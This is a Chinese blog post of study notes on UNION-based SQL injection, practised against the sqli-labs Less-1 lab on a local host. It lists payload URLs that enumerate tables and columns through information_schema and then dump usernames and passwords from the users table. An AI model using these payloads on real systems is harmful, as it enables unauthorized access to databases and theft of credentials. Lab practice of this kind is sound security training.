【SQL注入-union注入】

最新推荐文章于 2024-07-18 21:24:26 发布
最新推荐文章于 2024-07-18 21:24:26 发布
阅读量150 收藏
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52613207/article/details/131055057
版权

union注入的最终目标是拿到靶机中数据库里的所有用户名和密码

(1)database()知道所在的数据库

(2)拿到表名和列名

        数据库:在MySQL中,information_schema 数据库包含MySQL数据库的简要信息,其中包含有两个所需数据表,一个是tables-表名集合表,一个是columns-列名集合表

查询表名:

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables --+(会显示MySQL里所有的数据库包含的所有表名)

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+(只显示当前查询所在数据库里的表名,但无法完全显示出来,因而需要用到group_concat()函数)

group_concat()函数的作用:确保所有查询信息能放到一行显示出来

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

(1)最终查询结果,所在数据库security下的所有表名

 查询列名:

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() --+

(1)最终查询结果,所在数据库下所有表包含的所有列名

 http://127.0.0.1/sql/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

(1)最终查询结果,users表下的所有列名

 http://127.0.0.1/sql/Less-1/?id=-1' union select 1,group_concat(username,'-',password),3 from users --+

(1)成功拿到用户名和对应密码

 

摩西的宇宙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入方法之:获取列名
weixin_30763397的博客
02-11 943
select col_name(object_id('table'),1) from sysobjects where name='table' 转载于:https://www.cnblogs.com/CsOH/p/6389981.html
SQL-union注入
m0_62886641的博客
04-22 131
burpsuite使用以及union注入,是自己的复习笔记
网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)
热门推荐
关注网络安全、云原生安全
10-11 2万+
目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 SQL Injection-MIDDLE SQL Injection-HIGH SQL Injection(Blind)-LOW Boolean盲注 获取数据库sqlmap 获取数据库获取表名 获取列名 获取数据 SQL Injection(Blin.
sql注入之select/union select
@一只躺平的猪@的博客
07-14 2992
select :select 1 from table、 select count(1) from table、select sum(1) from table union select:union语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
SQL注入-联合查询注入union
qq_57307348的博客
01-23 3464
目录 SQL注入的一库三表 union联合查询注入注意事项 MySQL函数利用 1、常用函数 2、连接字符串函数 联合查询注入union 利用前提 联合注入的过程 1、先判断有没有注入点 3、判断有多少列 4、判断显示位 5、显示有哪些数据库 6、显示数据库中有哪些表 7、显示表中有哪些字段(以users为例) 8、获取字段 SQL注入的一库三表 information_schema 元数据数据库 (数据库名, 表名, 字段...
sql注入——union联合注入
hintll的博客
06-22 1005
sql注入——union联合注入 union注入sql注入的一大类型 在做有关sql联合注入时一般用以下思路进行解题: 1.首先要找到能与数据库交互的注入点: 2.测试字段的数量,判断SQL语句查询的列数: 在这里我们使用的命理是order by 通常构造:?id=1’ order by sum–+ 和 1’ order by sum# 这里的sum指代的是数字从1开始逐个测试直至3回显有报错为止: ?id=1’ order by 1–+ ?id=1’ order by 2–+ ?id=1’ orde
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
详解SQL注入--安全(二)
09-09
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或转义用户输入的SQL语句时。当攻击者向Web表单或URL参数中输入特定的SQL命令片段时,他们可以篡改数据库查询,获取敏感信息,甚至控制整个数据库...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
PostgreSQL的Json数据类型如何使用
招风的黑耳CSDN
07-18 195
PostgreSQL中的JSON数据类型提供了一种灵活的方式来存储JSON(JavaScript Object Notation)数据。JSON是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器解析和生成。在PostgreSQL中,你可以使用JSON和JSONB(JSON的二进制格式,支持索引和更快的查询)数据类型来存储JSON数据。
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 685
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
SQL Server设置定时作业调度Schedule
Cachel Wood的博客
07-15 363
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
PostgreSQL的逻辑架构
weixin_41992498的博客
07-18 30
一、PostgreSql的逻辑架构:所有者:
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 965
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问题是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
sqlalchemy定期保持mysql连接活跃
ithongchou的博客
07-18 115
数据库时,确保保持活跃连接是很重要的,特别是在长时间不使用数据库连接时。使用连接池管理数据库连接。通过配置合适的连接池参数可以有效地保持活跃连接。,以保持连接的活跃状态。这可以通过任务调度库如。(超出连接池大小时允许创建的额外连接数)和。(连接在被放回连接池前的最大生存时间)等。查询,保持数据库连接的活跃状态。可以定期执行简单的查询,例如。这个例子会每隔一段时间执行。
怎样在 PostgreSQL 中优化对大表的并发读取操作?
技术笔记
07-15 954
在 PostgreSQL 中,大表通常是指包含大量数据的表。这些表可能有数百万、数千万甚至数十亿条记录。当我们处理这样的大表时,查询操作可能会变得非常缓慢,特别是在并发读取的情况下。并发读取操作是指多个进程或线程同时从数据库中读取数据的操作。在实际应用中,并发读取操作是非常常见的,例如多个用户同时查询一个报表或者多个系统同时获取数据进行分析。优化 PostgreSQL 中对大表的并发读取操作是一个综合性的任务,需要我们从多个方面入手。
如何查询Oracle数据库一周内每天的SQL执行次数
最新发布
weixin_60783132的博客
07-18 552
今天引入的问题是:oracle数据库怎么查询一周内,每天的查询次数?数据库的AWR报告会记录SQL的执行情况,可以从DBA_HIST_SNAPSHOT、在DBA_HIST_SQLSTAT这两个视图通过快照 id join一下得到记录了系统七天内Oracle数据库SQL执行次数。如果有异常,再去分析问题。如果某一条SQL执行异常,需要做分析,怎么找出这条SQL文本。
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值